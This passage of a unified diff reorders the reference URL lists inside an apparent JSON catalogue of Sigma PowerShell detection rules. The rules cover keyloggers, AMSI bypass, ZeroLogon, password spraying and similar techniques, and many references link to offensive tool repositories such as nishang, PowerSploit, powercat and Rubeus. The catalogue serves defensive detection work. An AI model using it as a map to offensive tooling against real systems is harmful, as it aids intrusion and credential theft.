"https://github.com/DarkCoderSc/PowerRunAsSystem/", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://github.com/NetSPI/PowerUpSQL", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://github.com/samratashok/nishang", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://github.com/HarmJ0y/DAMP", + "https://github.com/CsEnox/EventViewer-UACBypass", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_exploit_scripts.yml" ], "tags": [ @@ -28870,8 +28870,8 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1", + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml" ], "tags": [ @@ -29080,8 +29080,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content", "https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell", + "https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_add_windows_capability.yml" ], "tags": [ @@ -29137,8 +29137,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", + "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml" ], "tags": [ @@ -29313,8 +29313,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.2", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remote_session_creation.yml" ], "tags": [ @@ -29414,8 +29414,8 @@ "logsource.product": "windows", "refs": [ "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_windows_defender_set_mp.yml" ], "tags": [ @@ -29482,8 +29482,8 @@ "logsource.product": "windows", "refs": [ "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)", - "https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt", + "https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_msxml_com.yml" ], "tags": [ @@ -29634,10 +29634,10 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon", - "https://thedfirreport.com/2020/10/08/ryuks-return", "https://adsecurity.org/?p=2277", "https://powersploit.readthedocs.io/en/stable/Recon/README", + "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon", + "https://thedfirreport.com/2020/10/08/ryuks-return", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml" ], "tags": [ @@ -29745,9 +29745,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2", "https://www.ietf.org/rfc/rfc2821.txt", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml" ], "tags": [ @@ -29780,8 +29780,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml" ], @@ -29850,8 +29850,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml" ], "tags": [ @@ -29985,11 +29985,11 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", - "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell", - "http://woshub.com/manage-windows-firewall-powershell/", + "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", + "http://woshub.com/manage-windows-firewall-powershell/", + "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml" ], "tags": [ @@ -30179,10 +30179,10 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://youtu.be/5mqid-7zp8k?t=2481", "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://youtu.be/5mqid-7zp8k?t=2481", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml" ], "tags": [ @@ -30338,8 +30338,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2", "https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml" ], "tags": [ @@ -30405,9 +30405,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://reconshell.com/winpwn-tool-for-internal-windows-pentesting-and-ad-security/", - "https://github.com/redcanaryco/atomic-red-team/blob/4d6c4e8e23d465af7a2388620cfe3f8c76e16cf0/atomics/T1082/T1082.md", "https://www.publicnow.com/view/EB87DB49C654D9B63995FAD4C9DE3D3CC4F6C3ED?1671634841", + "https://github.com/redcanaryco/atomic-red-team/blob/4d6c4e8e23d465af7a2388620cfe3f8c76e16cf0/atomics/T1082/T1082.md", + "https://reconshell.com/winpwn-tool-for-internal-windows-pentesting-and-ad-security/", "https://github.com/S3cur3Th1sSh1t/WinPwn", "https://grep.app/search?q=winpwn&filter[repo][0]=redcanaryco/atomic-red-team", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hktl_winpwn.yml" @@ -30502,8 +30502,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.powershellgallery.com/packages/DSInternals", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount", + "https://www.powershellgallery.com/packages/DSInternals", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adreplaccount.yml" ], "tags": [ @@ -30579,8 +30579,8 @@ "logsource.product": "windows", "refs": [ "https://adsecurity.org/?p=2604", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml" ], "tags": [ @@ -31055,8 +31055,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://twitter.com/JohnLaTwC/status/850381440629981184", "https://t.co/ezOTGy1a1G", + "https://twitter.com/JohnLaTwC/status/850381440629981184", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml" ], "tags": [ @@ -31124,8 +31124,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps", "https://twitter.com/NathanMcNulty/status/1569497348841287681", + "https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml" ], "tags": [ @@ -31191,8 +31191,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1", "https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md", + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_acl_susp_location.yml" ], "tags": [ @@ -31324,8 +31324,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/cyb3rops/status/1617108657166061568?s=20", - "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges", "https://github.com/samratashok/ADModule", + "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_active_directory_module_dll_import.yml" ], "tags": [ @@ -31350,8 +31350,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1", "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319", + "https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml" ], "tags": [ @@ -31385,8 +31385,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", "https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_gpo.yml" ], "tags": [ @@ -31419,8 +31419,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md", "https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps", + "https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_windows_optional_feature.yml" ], "tags": [ @@ -31453,8 +31453,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1098/T1098.md#atomic-test-1---admin-account-manipulate", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/?view=powershell-5.1", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1098/T1098.md#atomic-test-1---admin-account-manipulate", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_localuser.yml" ], "tags": [ @@ -31777,8 +31777,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/Gerenios/AADInternals", "https://o365blog.com/aadinternals/", + "https://github.com/Gerenios/AADInternals", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml" ], "tags": [ @@ -31889,8 +31889,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-2---map-admin-share-powershell", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-psdrive?view=powershell-7.2", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-2---map-admin-share-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_new_psdrive.yml" ], "tags": [ @@ -31999,8 +31999,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting", + "https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_as_rep_roasting.yml" ], "tags": [ @@ -32067,8 +32067,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", "https://www.offensive-security.com/metasploit-unleashed/timestomp/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_timestomp.yml" ], "tags": [ @@ -32134,8 +32134,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine", + "https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml" ], "tags": [ @@ -32203,8 +32203,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", "https://attack.mitre.org/datasources/DS0005/", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml" ], "tags": [ @@ -32318,9 +32318,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", "https://twitter.com/oroneequalsone/status/1568432028361830402", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", + "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml" ], "tags": [ @@ -32487,9 +32487,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate", "https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a", + "https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_export_certificate.yml" ], "tags": [ @@ -32555,8 +32555,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA", "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", + "https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml" ], "tags": [ @@ -32590,8 +32590,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso", "https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml" ], "tags": [ @@ -32793,8 +32793,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml" ], "tags": [ @@ -33084,8 +33084,8 @@ "refs": [ "https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1", "https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7", - "https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462", "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1", + "https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml" ], "tags": [ @@ -33151,8 +33151,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", "https://learn.microsoft.com/en-us/windows/wsl/install-on-server", + "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_susp_windows_optional_feature.yml" ], @@ -33210,8 +33210,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_start_process.yml" ], "tags": [ @@ -33454,8 +33454,8 @@ "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content", - "https://twitter.com/ScumBots/status/1610626724257046529", "https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0", + "https://twitter.com/ScumBots/status/1610626724257046529", "https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml" ], @@ -33590,8 +33590,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57", + "https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_download_com_cradles.yml" ], "tags": [ @@ -33624,24 +33624,24 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/samratashok/nishang", - "https://github.com/DarkCoderSc/PowerRunAsSystem/", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", - "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", - "https://github.com/adrecon/ADRecon", "https://github.com/adrecon/AzureADRecon", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", - "https://github.com/Kevin-Robertson/Powermad", - "https://adsecurity.org/?p=2921", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", - "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://github.com/calebstewart/CVE-2021-1675", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", - "https://github.com/HarmJ0y/DAMP", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", "https://github.com/besimorhino/powercat", + "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", + "https://github.com/DarkCoderSc/PowerRunAsSystem/", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", + "https://github.com/calebstewart/CVE-2021-1675", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://github.com/samratashok/nishang", + "https://github.com/Kevin-Robertson/Powermad", + "https://github.com/HarmJ0y/DAMP", + "https://github.com/adrecon/ADRecon", + "https://adsecurity.org/?p=2921", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml" ], "tags": [ @@ -33773,9 +33773,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ + "https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/", "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics", "https://www.shellhacks.com/clear-history-powershell/", - "https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml" ], "tags": [ @@ -33816,9 +33816,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/GhostPack/Rubeus", "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html", "https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus", + "https://github.com/GhostPack/Rubeus", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hktl_rubeus.yml" ], "tags": [ @@ -34253,8 +34253,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md", "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md", 